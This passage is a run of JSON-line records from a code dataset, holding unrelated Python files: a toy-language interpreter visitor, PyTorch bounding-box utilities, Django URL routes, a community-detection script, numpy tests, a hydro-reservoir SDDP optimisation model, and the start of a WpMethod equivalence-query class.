have a constructor method but \"\n \"initialization detected {} arguments passed.\"\n ).format(call_object.class_name, len(node.call_args))\n )\n elif class_constructor is not None:\n self.__run_internal_function(class_constructor, node.call_args)\n\n self.env.exit_scope()\n return instance_ptr\n else:\n raise InternalRuntimeError(\"Object is not callable!\")\n\n def visit_dot_node(self, node):\n left = node.left.accept(self)\n\n if isinstance(left, Scope):\n val = left.get_variable(node.right.val)\n if val is not None:\n return val\n else:\n err_msg = \"Current environment does not contain the variable {}\".format(node.right.val)\n raise InternalRuntimeError(err_msg)\n elif left.obj_type == ObjectType.MODULE:\n val = left.namespace.get_variable(node.right.val)\n if val is not None:\n return val\n else:\n err_msg = \"Module environment does not contain the variable {}\".format(node.right.lexeme)\n raise InternalRuntimeError(err_msg)\n elif left.obj_type == ObjectType.CLASS_INSTANCE:\n val = left.get_field(node.right.val)\n if val is not None:\n return val\n else:\n err_msg = ('Class instance \"{}\" of class \"{}\" does not contain a field ' 'with name \"{}\"').format(\n node.left.val, left.class_name, node.right.val\n )\n raise InternalRuntimeError(err_msg)\n else:\n err_msg = \"variable {} is not accessible!\".format(node.left.val)\n raise InternalRuntimeError(err_msg)\n\n def visit_this(self):\n curr_scope = self.env.peek()\n while curr_scope.parent is not None:\n curr_scope = curr_scope.parent\n return curr_scope\n\n def visit_return(self, node):\n if node.expr is None:\n return ReturnObject(NilObject())\n\n return_val = node.expr.accept(self)\n return ReturnObject(return_val)\n\n def visit_continue(self):\n return ContinueObject()\n\n def visit_break(self):\n return BreakObject()\n\n def visit_do_while(self, node):\n # First execution of the body which always happens\n ret_val = node.body.accept(self)\n if ret_val is not None:\n # Exit loop early using return\n if ret_val.obj_type == ObjectType.BREAK:\n return\n # There is no need to do anything here. We need to reevaluate the test\n # condition for the loop.\n elif ret_val.obj_type == ObjectType.CONTINUE:\n pass\n # \"return\" value is floated up\n else:\n return ret_val\n\n # Subsequent executions which depend on the ocndition\n cond_value = node.cond.accept(self)\n while is_truthy(cond_value):\n # Detect any usage of return\n ret_val = node.body.accept(self)\n if ret_val is not None:\n # Exit loop early using return\n if ret_val.obj_type == ObjectType.BREAK:\n return\n # There is no need to do anything here. We need to reevaluate the test\n # condition for the loop.\n elif ret_val.obj_type == ObjectType.CONTINUE:\n continue\n # \"return\" value is floated up\n else:\n return ret_val\n cond_value = node.cond.accept(self)\n\n def visit_array(self, node):\n eval_elem = list()\n for elem in node.elements:\n elem_val = elem.accept(self)\n eval_elem.append(elem_val)\n\n return ArrayObject(eval_elem)\n\n def visit_array_access(self, node):\n array_obj = node.array_name.accept(self)\n array_idx = node.array_pos.accept(self)\n if array_obj.obj_type != ObjectType.ARRAY:\n err_str = \"Object is not an array and cannot be accessed using '[]'!\"\n raise InternalRuntimeError(err_str)\n if array_idx.obj_type != ObjectType.INT:\n err_str = \"Array index is not a number but a '{}'!\".format(str(array_idx.obj_type))\n raise InternalRuntimeError(err_str)\n if array_idx.value < array_obj.size:\n return array_obj.elements[array_idx.value]\n else:\n msg = \"Array has a size of {} but you want to access position {}\".format(array_obj.size, array_idx.value)\n raise InternalRuntimeError(msg)\n\n def visit_incr(self, node):\n node_val = node.value.accept(self)\n node_val.value += 1\n return node_val\n\n def visit_decr(self, node):\n node_val = node.value.accept(self)\n node_val.value -= 1\n return node_val\n\n def visit_nil(self):\n return NilObject()\n\n def visit_import(self, node):\n module_name = node.module_name + \".zai\"\n module_path, module_text = read_module_contents(module_name)\n if module_text is None:\n err_msg = \"Module {} could not be found within the interpreter path.\".format(node.filename)\n raise InternalRuntimeError(err_msg)\n\n # Initialize lexer and environment used to execute module contents\n lexer = Lexer()\n import_env = EnvironmentStack()\n\n # Lex and parse module contents\n tok_stream = lexer.tokenize_string(module_text)\n parser = Parser(tok_stream, module_text)\n root = parser.parse()\n\n import_visitor = Visitor(import_env)\n import_visitor.visit(root)\n # Take the module's global environment to be added to the namespace.\n import_scope = import_visitor.env.peek()\n\n # Determine the name with which the module will be accessed.\n module_env_name = node.module_name\n if node.import_name is not None:\n module_env_name = node.import_name\n\n self.env.peek().initialize_variable(\n module_env_name,\n ModuleObject(node.module_name, module_path, import_scope, module_env_name),\n )\n\n def visit_add_assign(self, node):\n # Symbol name will always be an id node\n symbol_name = node.symbol_name.val\n # Evaluate the right hand side containing the value which will be assigned\n new_value = node.increment.accept(self)\n\n # Find if a path to the variable exists\n symbol_path = None\n if node.symbol_path is None:\n current_scope = self.env.peek()\n old_val = current_scope.get_variable(symbol_name)\n status = current_scope.replace_variable(symbol_name, old_val + new_value)\n if status is False:\n err_msg = (\n 'Variable \"{}\" cannot be reasigned because it does not exist' \" within the environment.\"\n ).format(symbol_name)\n raise InternalRuntimeError(err_msg)\n else:\n symbol_path = node.symbol_path.accept(self)\n if isinstance(symbol_path, Scope):\n old_val = symbol_path.get_variable(symbol_name)\n status = symbol_path.replace_variable(symbol_name, old_val + new_value)\n if status is False:\n err_msg = (\n 'Variable \"{}\" cannot be reasigned because it does not'\n \"exist within the current class environment.\"\n ).format(symbol_name)\n raise InternalRuntimeError(err_msg)\n elif symbol_path.obj_type in [ObjectType.MODULE, ObjectType.CLASS_INSTANCE]:\n old_val = symbol_path.namespace.get_variable(symbol_name)\n status = symbol_path.namespace.replace_variable(symbol_name, old_val + new_value)\n if status is False:\n err_msg = ('Variable \"{}\" cannot be reasigned because it does not ' \"exist.\").format(symbol_name)\n raise InternalRuntimeError(err_msg)\n\n def visit_sub_assign(self, node):\n # Symbol name will always be an id node\n symbol_name = node.symbol_name.val\n # Evaluate the right hand side containing the value which will be assigned\n new_value = node.decrement.accept(self)\n\n # Find if a path to the variable exists\n symbol_path = None\n if node.symbol_path is None:\n current_scope = self.env.peek()\n old_val = current_scope.get_variable(symbol_name)\n status = current_scope.replace_variable(symbol_name, old_val - new_value)\n if status is False:\n err_msg = (\n 'Variable \"{}\" cannot be reasigned because it does not exist' \" within the environment.\"\n ).format(symbol_name)\n raise InternalRuntimeError(err_msg)\n else:\n symbol_path = node.symbol_path.accept(self)\n if isinstance(symbol_path, Scope):\n old_val = symbol_path.get_variable(symbol_name)\n status = symbol_path.replace_variable(symbol_name, old_val - new_value)\n if status is False:\n err_msg = (\n 'Variable \"{}\" cannot be reasigned because it does not '\n \"exist within the current class environment.\"\n ).format(symbol_name)\n raise InternalRuntimeError(err_msg)\n elif symbol_path.obj_type in [ObjectType.MODULE, ObjectType.CLASS_INSTANCE]:\n old_val = symbol_path.namespace.get_variable(symbol_name)\n status = symbol_path.namespace.replace_variable(symbol_name, old_val - new_value)\n if status is False:\n err_msg = ('Variable \"{}\" cannot be reasigned because it does not ' \"exist.\").format(symbol_name)\n raise InternalRuntimeError(err_msg)\n","repo_name":"sehnsucht13/zai-pl","sub_path":"zai/visitor.py","file_name":"visitor.py","file_ext":"py","file_size_in_byte":25615,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"21838969343","text":"import torch\nimport torch.distributed as dist\nimport torch.nn.functional as F\nfrom detectron2.utils.comm import get_world_size\n\n\ndef reduce_sum(tensor):\n world_size = get_world_size()\n if world_size < 2:\n return tensor\n tensor = tensor.clone()\n dist.all_reduce(tensor, op=dist.ReduceOp.SUM)\n return tensor\n\n\ndef aligned_bilinear(tensor, factor):\n assert tensor.dim() == 4\n assert factor >= 1\n assert int(factor) == factor\n\n if factor == 1:\n return tensor\n\n h, w = tensor.size()[2:]\n tensor = F.pad(tensor, pad=(0, 1, 0, 1), mode=\"replicate\")\n oh = factor * h + 1\n ow = factor * w + 1\n tensor = F.interpolate(tensor, size=(oh, ow), mode=\"bilinear\", align_corners=True)\n tensor = F.pad(tensor, pad=(factor // 2, 0, factor // 2, 0), mode=\"replicate\")\n\n return tensor[:, :, : oh - 1, : ow - 1]\n\n\ndef compute_locations(h, w, stride, device):\n shifts_x = torch.arange(\n 0, w * stride, step=stride, dtype=torch.float32, device=device\n )\n shifts_y = torch.arange(\n 0, h * stride, step=stride, dtype=torch.float32, device=device\n )\n shift_y, shift_x = torch.meshgrid(shifts_y, shifts_x)\n shift_x = shift_x.reshape(-1)\n shift_y = shift_y.reshape(-1)\n locations = torch.stack((shift_x, shift_y), dim=1) + stride // 2\n return locations\n\n\ndef distance2bbox(points, distance, max_shape=None):\n \"\"\"Decode distance prediction to bounding box.\n\n Args:\n points (Tensor): Shape (n, 2), [x, y].\n distance (Tensor): Distance from the given point to 4\n boundaries (left, top, right, bottom).\n max_shape (tuple): Shape of the image.\n\n Returns:\n Tensor: Decoded bboxes.\n \"\"\"\n x1 = points[:, 0] - distance[:, 0]\n y1 = points[:, 1] - distance[:, 1]\n x2 = points[:, 0] + distance[:, 2]\n y2 = points[:, 1] + distance[:, 3]\n if max_shape is not None:\n x1 = x1.clamp(min=0, max=max_shape[1])\n y1 = y1.clamp(min=0, max=max_shape[0])\n x2 = x2.clamp(min=0, max=max_shape[1])\n y2 = y2.clamp(min=0, max=max_shape[0])\n return torch.stack([x1, y1, x2, y2], -1)\n\n\ndef bbox2distance(points, bbox, max_dis=None, eps=0.1):\n \"\"\"Decode bounding box based on distances.\n\n Args:\n points (Tensor): Shape (n, 2), [x, y].\n bbox (Tensor): Shape (n, 4), \"xyxy\" format\n max_dis (float): Upper bound of the distance.\n eps (float): a small value to ensure target < max_dis, instead <=\n\n Returns:\n Tensor: Decoded distances.\n \"\"\"\n left = points[:, 0] - bbox[:, 0]\n top = points[:, 1] - bbox[:, 1]\n right = bbox[:, 2] - points[:, 0]\n bottom = bbox[:, 3] - points[:, 1]\n if max_dis is not None:\n left = left.clamp(min=0, max=max_dis - eps)\n top = top.clamp(min=0, max=max_dis - eps)\n right = right.clamp(min=0, max=max_dis - eps)\n bottom = bottom.clamp(min=0, max=max_dis - eps)\n return torch.stack([left, top, right, bottom], -1)\n","repo_name":"facebookresearch/unbiased-teacher-v2","sub_path":"ubteacher/utils/comm.py","file_name":"comm.py","file_ext":"py","file_size_in_byte":2968,"program_lang":"python","lang":"en","doc_type":"code","stars":90,"dataset":"github-code","pt":"96"} +{"seq_id":"18688965844","text":"from . import views\nfrom django.urls import path, include\nfrom .views import (\n AnswerListView,\n UserAnswersListView,\n AnswerDetailView,\n AnswerUpdateView,\n AnswerCreateView,\n AnswerDeleteView,\n UserExerciseListView,\n ExerciseDetailView,\n ExerciseListView,\n ExerciseUpdateView,\n ExerciseDeleteView,\n ExerciseCreateView,\n SubjectListView,\n SubjectDetailView,\n SubjectUpdateView,\n SubjectDeleteView,\n SubjectCreateView,\n UserSubjectListView,\n TopicListView,\n TopicDetailView,\n TopicUpdateView,\n TopicDeleteView,\n TopicCreateView,\n UserTopicListView,\n LessonListView,\n LessonDetailView,\n LessonUpdateView,\n LessonDeleteView,\n LessonCreateView,\n UserLessonListView,\n TodayListView,\n TodayDetailView,\n TodayUpdateView,\n TodayDeleteView,\n TodayCreateView,\n UserTodayListView\n\n)\n\n\nurlpatterns = [\n path('subjects', SubjectListView.as_view(), name='subject-list'),\n path('subject//', SubjectDetailView.as_view(), name='subject-detail'),\n path('subject/new/', SubjectCreateView.as_view(), name='subject-create'),\n path('subject//update/', SubjectUpdateView.as_view(), name='subject-update'),\n path('subject//delete/', SubjectDeleteView.as_view(), name='subject-delete'),\n path('user/', UserSubjectListView.as_view(), name='user-subjects'),\n path('topics', TopicListView.as_view(), name='topic-list'),\n path('topic//', TopicDetailView.as_view(), name='topic-detail'),\n path('topic/new/', TopicCreateView.as_view(), name='topic-create'),\n path('topic//update/', TopicUpdateView.as_view(), name='topic-update'),\n path('topic//delete/', TopicDeleteView.as_view(), name='topic-delete'),\n path('user/', UserTopicListView.as_view(), name='user-topics'),\n path('lesson//', LessonDetailView.as_view(), name='lesson-detail'),\n path('lessons', LessonListView.as_view(), name='lesson-list'),\n path('lesson/new/', LessonCreateView.as_view(), name='lesson-create'),\n path('lesson//update/', LessonUpdateView.as_view(), name='lesson-update'),\n path('lesson//delete/', LessonDeleteView.as_view(), name='lesson-delete'),\n path('user/', UserLessonListView.as_view(), name='user-lessons'),\n path('exercises', ExerciseListView.as_view(), name='exercises'),\n path('exercise//', ExerciseDetailView.as_view(), name='exercise-detail'),\n path('exercise/new/', ExerciseCreateView.as_view(), name='exercise-create'),\n path('exercise//update/', ExerciseUpdateView.as_view(), name='exercise-update'),\n path('exercise//delete/', ExerciseDeleteView.as_view(), name='exercise-delete'),\n path('user/', UserExerciseListView.as_view(), name='user-exercises'),\n path('answers', AnswerListView.as_view(), name='answer-list'),\n path('answer/new/', AnswerCreateView.as_view(), name='answer-create'),\n path('answer//', AnswerDetailView.as_view(), name='answer-detail'),\n path('answer//update/', AnswerUpdateView.as_view(), name='answer-update'),\n path('answer//delete/', AnswerDeleteView.as_view(), name='answer-delete'),\n path('user/', UserAnswersListView.as_view(), name='user-answers'),\n path('', views.answer, name='answer'),\n path('todays', TodayListView.as_view(), name='today-list'),\n path('today//', TodayDetailView.as_view(), name='today-detail'),\n path('today/new/', TodayCreateView.as_view(), name='today-create'),\n path('today/update/', TodayUpdateView.as_view(), name='today-update'),\n path('today//delete/', TodayDeleteView.as_view(), name='today-delete'),\n path('user/', UserTodayListView.as_view(), name='user-todays'),\n] ","repo_name":"Fabricourt/school","sub_path":"subjects/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"73528062716","text":"from sklearn.metrics import normalized_mutual_info_score\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport community\nimport networkx as nx\n\n\ndef community_detection(gnx: nx.Graph, node_order, encoding, true_labels, alpha: float = 1):\n node_to_idx = {str(node): i for i, node in enumerate(node_order)}\n similarity_matrix = cosine_similarity(encoding.tolist())\n for u in gnx.nodes():\n for v in gnx.nodes():\n if (u, v) in gnx.edges():\n # 1 * (1 - alpha) + alpha * similarity\n gnx.edges()[(u, v)]['weight'] = (1 - alpha) + \\\n (alpha * abs(similarity_matrix[node_to_idx[u], node_to_idx[v]]))\n else:\n # 0 * (1 - alpha) + alpha * similarity\n gnx.add_edge(u, v)\n gnx.edges()[(u, v)]['weight'] = (alpha * abs(similarity_matrix[node_to_idx[u], node_to_idx[v]]))\n\n partition = community.best_partition(gnx)\n score = normalized_mutual_info_score([partition[n] for n in node_order], true_labels)\n return partition, score\n\n\ndef encode_by_labels(dataset, gcn_params, activator_params):\n model = MultiLevelGCN(gcn_params(ftr_len=dataset.len_features, num_classes=dataset.num_classes))\n activator = MultiClassGCNActivator(model, activator_params(), dataset, nni=False)\n activator.train(show_plot=False, validation_rate=10, early_stop=True)\n encodings = activator.encode_graph()\n return encodings\n\n\nif __name__ == \"__main__\":\n from gcn_model import MultiLevelGCN\n from dataset.dataset_model import GnxDataset\n from multi_class_gcn_activator import MultiClassGCNActivator\n from params.parameters import DatasetParams, MultiLevelGCNParams, GCNActivatorParams\n from params.cora_params import CoraDatasetParams, CoraMultiLevelGCNParams, CoraGCNActivatorParams\n # from params.eu_email_params import EuEmailDatasetParams, EuEmailMultiLevelGCNParams, EuEmailGCNActivatorParams\n\n ds_ = GnxDataset(CoraDatasetParams())\n true_labels_ = [ds_.label_by_node_name(node) for node in ds_.node_order]\n\n encodings_ = encode_by_labels(ds_, CoraMultiLevelGCNParams, CoraGCNActivatorParams)\n\n scores_ = {}\n for alpha_ in [i / 10 for i in range(1, 11)]:\n partition_, score_ = community_detection(ds_.gnx, ds_.node_order, encodings_, true_labels_, alpha=alpha_)\n scores_[alpha_] = score_\n print(alpha_, score_)\n\n for alpha_, score_ in scores_.items():\n print(alpha_, score_)\n\n","repo_name":"louzounlab/comuniy_detection","sub_path":"cummunity_detection.py","file_name":"cummunity_detection.py","file_ext":"py","file_size_in_byte":2495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"6461710722","text":"import numpy\nimport mysum2d\n\ndef test_mysum_lists():\n\tA = numpy.array([[1,2],[3,4]])\n\tB = numpy.array([[4],[5]])\n\t\n\tC_expected = numpy.array([[1*4 + 2*5], [3*4 + 4*5]])\n\tC = mysum2d.mysum_lists(A, B)\n\t\n\tnumpy.testing.assert_allclose(C, C_expected)\n\tassert C.shape == C_expected.shape, (\"shapes are weird\", C.shape, C_expected.shape)\n\tassert (C == C_expected).all()\n\t\ndef test_mysum_numpy():\n\tA = numpy.array([[1,2],[3,4]])\n\tB = numpy.array([[4],[5]])\n\t\n\tC_expected = numpy.array([[1*4 + 2*5], [3*4 + 4*5]])\n\tC = mysum2d.mysum_numpy(A, B)\n\tnumpy.testing.assert_allclose(C, C_expected)\n\t\ndef test_mysum_einsum():\n\tA = numpy.array([[1,2],[3,4]])\n\tB = numpy.array([[4],[5]])\n\t\n\tC_expected = numpy.array([[1*4 + 2*5], [3*4 + 4*5]])\n\tC = mysum2d.mysum_einsum(A, B)\n\tnumpy.testing.assert_allclose(C, C_expected)\n\n\ndef test_wrong_mysum_numpy():\n\tA = numpy.array([[1,2],[3,4]])\n\tB = numpy.array([[4,5]])\n\t\n\tfailed = False\n\t\n\ttry:\n\t\tC = mysum2d.mysum_numpy(A, B)\n\texcept ValueError as e:\n\t\tfailed = True\n\t\n\tassert failed, \"assert was raised as expected\"\n\n\nimport pytest\ndef test_wronginput_mysum_lists():\n\tA = numpy.array([[1,2],[3,4]])\n\tB = numpy.array([[4,5]])\n\t\n\twith pytest.raises(AssertionError):\n\t\tmysum2d.mysum_lists(A, B)\n\nimport pytest\ndef test_wronginput_mysum_numpy():\n\tA = numpy.array([[1,2],[3,4]])\n\tB = numpy.array([[4,5]])\n\t\n\twith pytest.raises(ValueError):\n\t\tmysum2d.mysum_numpy(A, B)\n\n\n\n\n\n","repo_name":"JohannesBuchner/S4","sub_path":"test_mysum.py","file_name":"test_mysum.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"43431801142","text":"'''\nCreated on Jan 3, 2018\n\n@author: dduque\n'''\nimport csv\nimport SDDP\nimport logging\nimport numpy as np\nfrom Utils.file_savers import write_object_results\nnp.set_printoptions(linewidth= 200, nanstr='nen')\nfrom SDDP.RandomnessHandler import RandomContainer, StageRandomVector, AR1_depedency\nfrom SDDP.SDDP_Alg import SDDP\nfrom SDDP import logger as sddp_log\n\nfrom Utils.argv_parser import sys,parse_args\nfrom gurobipy import *\nfrom InstanceGen.ReservoirChainGen import read_instance, HydroRndInstance\nfrom HydroExamples import *\nfrom SDDP.RiskMeasures import DistRobust, PhilpottInnerDROSolver, DistRobustDuality,\\\n InnerDROSolverX2, DistRobustWasserstein, mod_chi2, DistRobustWassersteinCont\nfrom OutputAnalysis.SimulationAnalysis import plot_sim_results,\\\n plot_metrics_comparison, plot_lbs\nfrom SDDP.RandomManager import experiment_desing_gen,\\\n reset_experiment_desing_gen\n\n'''\nGlobal variables to store instance data\n'''\nT = None\nnr = None\nlag = None\ndro_radius = None\nRmatrix = None\nRHSnoise = None\ninitial_inflow = None \nvalley_chain = None\nvalley_chain_oos = None\nprices = None\nWater_Penalty = 10000\n\ndef random_builder():\n rc = RandomContainer()\n rndVectors = []\n for t in range(0,T):\n rv_t = StageRandomVector(t)\n rc.append(rv_t)\n for (i,r) in enumerate(valley_chain):\n if t>0:\n re = rv_t.addRandomElement('innovations[%i]' %(i), r.inflows)\n else:\n re = rv_t.addRandomElement('innovations[%i]' %(i), [0.0])\n rndVectors.append(rv_t)\n rc.preprocess_randomness()\n return rc\n\ndef random_builder_out_of_sample(vally_chain_sample):\n '''\n Generates a random container for out-of-sample performance.\n '''\n rc = RandomContainer()\n rndVectors = []\n for t in range(0,T):\n rv_t = StageRandomVector(t)\n rc.append(rv_t)\n for (i,r) in enumerate(vally_chain_sample):\n if t>0:\n re = rv_t.addRandomElement('innovations[%i]' %(i), r.inflows)\n else:\n re = rv_t.addRandomElement('innovations[%i]' %(i), [0.0])\n rndVectors.append(rv_t)\n rc.preprocess_randomness()\n return rc\n\n\n\ndef model_builder(stage):\n '''\n Builds a particular instance of a multistage problem\n '''\n import gurobipy as gb\n m = Model('Hydrovalley')\n \n '''\n State variables\n - Reservoir level\n - Inflows of previous time periods (according to the lag)\n '''\n #Reservoir level\n reservoir_level = m.addVars(nr, \n lb = [r.min for r in valley_chain], \n ub = [r.max for r in valley_chain], \n obj = 0,\n vtype=GRB.CONTINUOUS, \n name='reservoir_level')\n reservoir_level0 = m.addVars(nr, \n lb = 0, \n ub = 0, \n obj = 0,\n vtype=GRB.CONTINUOUS, \n name='reservoir_level0')\n lag_set = list(range(1,lag+1))\n inflow = m.addVars(nr, lag_set ,lb=-GRB.INFINITY, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name='inflow')\n inflow0 = m.addVars(nr, lag_set, lb=0, ub=0, obj=0, vtype=GRB.CONTINUOUS, name='inflow0')\n \n #RHS noise\n innovations = m.addVars(nr,lb=-GRB.INFINITY, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name='innovations')\n \n outflow = m.addVars(nr, lb=0, obj=0, vtype=GRB.CONTINUOUS, name='outflow')\n spill = m.addVars(nr, lb=0, obj=0, vtype=GRB.CONTINUOUS, name='spill')\n pour = m.addVars(nr, lb=0, obj=0, vtype=GRB.CONTINUOUS, name='pour')\n generation = m.addVar(lb=0, obj=0, vtype=GRB.CONTINUOUS, name='generation')\n dispatch = m.addVars([(ri,tf) for (ri,r) in enumerate(valley_chain) for tf in range(0,len(r.turbine.flowknots))],\n lb=0,ub=1,obj=0,vtype= GRB.CONTINUOUS,name='dispatch')\n if stage == 0:\n for v in reservoir_level0:\n reservoir_level0[v].lb = valley_chain[v].initial\n reservoir_level0[v].ub = valley_chain[v].initial\n for v in inflow0:\n v_lag = v[1] #Lag id\n v_res = v[0] #Reservoir id\n inflow0[v].lb = initial_inflow[-v_lag-1][v_res]\n inflow0[v].ub = initial_inflow[-v_lag-1][v_res]\n inflow[v].lb = initial_inflow[-v_lag][v_res]\n inflow[v].ub = initial_inflow[-v_lag][v_res]\n \n m.update()\n \n in_state = [v.VarName for v in reservoir_level0.values()]\n in_state.extend((v.VarName for v in inflow0.values()))\n out_state = [v.VarName for v in reservoir_level.values()]\n out_state.extend((v.VarName for v in inflow.values()))\n rhs_vars = [v.VarName for v in innovations.values()]\n \n #Constraints\n #AR model for the stage\n R_t = Rmatrix[stage] #For lag 1 only!\n m.addConstrs((inflow[i,1] == sum(R_t[l][i][j]*inflow0[j,l] for l in lag_set for j in R_t[l][i]) + innovations[i] for i in range(0,len(valley_chain)) ), 'AR_model_%i' %(1))\n m.addConstrs((inflow[i,l] == inflow0[i,l-1] for l in range(2,lag+1) for i in range(0,len(valley_chain))), 'AR_model')\n \n \n #R_t = Rmatrix[stage] #For lag 1 only!\n #m.addConstrs((inflow[i] - sum(R_t[1][i][j]*inflow0[j] for j in range(0,len(valley_chain)) if j in R_t[1][i]) == innovations[i] for i in range(0,len(valley_chain)) ), 'AR1')\n #Balance constraints\n #===========================================================================\n # m.addConstr(reservoir_level[0] == reservoir_level0[0] + sum(R_t[l][0][j]*inflow0[j,l] for l in lag_set for j in R_t[l][0]) + innovations[0] - outflow[0] - spill[0] + pour[0], 'balance[0]')\n # m.addConstrs((reservoir_level[i] == reservoir_level0[i] + sum(R_t[l][i][j]*inflow0[j,l] for l in lag_set for j in R_t[l][i])+ innovations[i] - outflow[i] - spill[i] + pour[i] + outflow[i-1] + spill[i-1] for i in range(1,nr)), 'balance')\n #===========================================================================\n \n m.addConstr(reservoir_level[0] == reservoir_level0[0] + inflow[0,1] - outflow[0] - spill[0] + pour[0], 'balance[0]')\n m.addConstrs((reservoir_level[i] == reservoir_level0[i] + inflow[i,1] - outflow[i] - spill[i] + pour[i] + outflow[i-1] + spill[i-1] for i in range(1,nr)), 'balance') \n \n \n #Generation\n m.addConstr(generation==quicksum(r.turbine.powerknots[level] * dispatch[i,level] for (i,r) in enumerate(valley_chain) for level in range(0,len(r.turbine.flowknots))), 'generationCtr')\n\n # Flow out\n for (i,r) in enumerate(valley_chain):\n m.addConstr(outflow[i] == quicksum(r.turbine.flowknots[level] * dispatch[i, level] for level in range(len(r.turbine.flowknots))), 'outflowCtr[%i]' %(i))\n \n #Dispatched\n for (i,r) in enumerate(valley_chain):\n m.addConstr(quicksum(dispatch[i, level] for level in range(len(r.turbine.flowknots)))<= 1, 'dispatchCtr[%i]' %(i))\n #Objective\n objfun = -prices[stage]*generation + quicksum(0*r.spill_cost*spill[i] for (i,r) in enumerate(valley_chain)) + quicksum(r.spill_cost*pour[i] for (i,r) in enumerate(valley_chain))\n m.setObjective(objfun, GRB.MINIMIZE)\n m.update()\n if stage == -1:\n print(initial_inflow)\n print_model(m)\n return m, in_state, out_state, rhs_vars\n\ndef print_model(m):\n for c in m.getConstrs(): print(c.ConstrName, m.getRow(c) , ' ', c.Sense, ' ', c.RHS)\n for v in m.getVars(): print(v.varname, ' ' , v.lb , ' --- ', v.ub)\n #for v in m.getVars(): print(v)\n \nif __name__ == '__main__':\n argv = sys.argv\n positional_args,kwargs = parse_args(argv[1:])\n if 'R' in kwargs:\n nr = kwargs['R']\n if 'T' in kwargs:\n T = kwargs['T']\n if 'max_iter' in kwargs:\n SDDP.options['max_iter'] = 100#kwargs['max_iter']\n SDDP.options['lines_freq'] = 1#int(SDDP.options['max_iter']/10)\n if 'sim_iter' in kwargs:\n SDDP.options['sim_iter'] = kwargs['sim_iter']\n if 'lag' in kwargs:\n lag = kwargs['lag']\n if 'dro_radius' in kwargs:\n dro_radius = kwargs['dro_radius']\n if 'N' in kwargs:\n N = kwargs['N']\n \n sddp_log.addHandler(logging.FileHandler(\"HydroAR%i_ESS.log\" %(lag), mode='w'))\n hydro_instance = read_instance('hydro_rnd_instance_R10_UD1_T120_LAG1_OUT10K_AR.pkl' , lag = lag)\n \n \n instance_name = \"Hydro_R%i_AR%i_T%i_I%i_ESS\" % (nr, lag, T, SDDP.options['max_iter'])\n Rmatrix = hydro_instance.ar_matrices\n RHSnoise_density = hydro_instance.RHS_noise[0:nr]\n N_training = N\n #Reset experiment design stream \n reset_experiment_desing_gen()\n train_indeces = set(experiment_desing_gen.choice(range(len(RHSnoise_density[0])),size=N_training, replace = False))\n test_indeces = set(range(len(RHSnoise_density[0]))) - train_indeces\n assert len(train_indeces.intersection(test_indeces))==0, 'Not disjoint'\n \n l_train = list(train_indeces)\n l_train.sort()\n RHSnoise = RHSnoise_density[:,l_train]\n dim_p = len(RHSnoise[0]) \n q_prob = 1/len(RHSnoise[0])\n \n initial_inflow = np.array(hydro_instance.inital_inflows)[:,0:nr]\n valley_turbines = Turbine([50, 60, 70], [55, 65, 70])\n \n \n #For out of sample performance measure\n l_test = list(test_indeces) \n l_test.sort()\n RHSnoise_oos = RHSnoise_density#[:,l_test]\n valley_chain_oos = [Reservoir(30, 200, 50, valley_turbines, Water_Penalty, x) for x in RHSnoise_oos]\n out_of_sample_rnd_cont = random_builder_out_of_sample(valley_chain_oos)\n \n prices = [10+round(5*np.sin(x),2) for x in range(0,T)]\n\n '''\n Wasserstein DUS Experiment 3\n Uses data points for origins and continuum support for destinations. Inner max problem\n is dualized to form a series of single-level problems. \n '''\n valley_chain = [Reservoir(30, 200, 50, valley_turbines, Water_Penalty, x) for x in RHSnoise]\n SDDP.options['multicut'] = True\n SDDP.options['dynamic_sampling'] = True\n rr = dro_radius\n instance_name = \"Hydro_R%i_AR%i_T%i_I%i_N%iESS_WC_%.5f\" % (nr, lag, T, SDDP.options['max_iter'], len(valley_chain[0].inflows), rr)\n #supp_ctrs = [{'innovations[%i]' %(resv):1 for resv in range(nr)} , {'innovations[%i]' %(resv):-1 for resv in range(nr)}]\n #supp_rhs = [RHSnoise_wasswer.sum(axis=0).max(), -(RHSnoise_wasswer.sum(axis=0).min())] \n supp_ctrs = [{'innovations[%i]' %(resv):1} for resv in range(nr)]\n supp_ctrs.extend(({'innovations[%i]' %(resv):-1}) for resv in range(nr))\n supp_rhs = [RHSnoise[resv].max() for resv in range(nr)] \n supp_rhs.extend((-RHSnoise[resv].min() for resv in range(nr))) \n algo = SDDP(T, model_builder, random_builder, risk_measure = DistRobustWassersteinCont, radius = rr, support_ctrs = supp_ctrs, support_rhs = supp_rhs)\n lbs = algo.run(instance_name=instance_name, dynamic_sampling=SDDP.options['dynamic_sampling'])\n \n sim_result = algo.simulate_policy(SDDP.options['sim_iter'], out_of_sample_rnd_cont)\n save_path = hydro_path+'/Output/WassersteinCont/%s_OOS.pickle' %(instance_name)\n write_object_results(save_path, sim_result)\n save_path = hydro_path+'/Output/DisceteWassersteinSingleCut/%s_LBS.pickle' %(instance_name)\n write_object_results(save_path, (algo.instance, lbs)) \n \n del(algo)\n \n \n","repo_name":"dukduque/SDDPpy","sub_path":"HydroExamples/Hydro_ARx_WassersteinCont.py","file_name":"Hydro_ARx_WassersteinCont.py","file_ext":"py","file_size_in_byte":11426,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"40920616159","text":"import itertools\nfrom collections import deque\n\n# +----------------------------------------------------------------------------\n# | pylstar Imports\n# +----------------------------------------------------------------------------\nfrom pylstar.tools.Decorators import PylstarLogger\nfrom pylstar.Word import Word\nfrom pylstar.Letter import EmptyLetter\nfrom pylstar.OutputQuery import OutputQuery\n\n\n@PylstarLogger\nclass WpMethodEQ(object):\n \"\"\"WPmethod algorithm used to trigger an equivalence query\"\"\"\n\n def __init__(self, knowledge_base, max_states, input_letters):\n self.knowledge_base = knowledge_base\n self.max_states = max_states\n self.input_letters = input_letters\n\n def find_counterexample(self, hypothesis):\n if hypothesis is 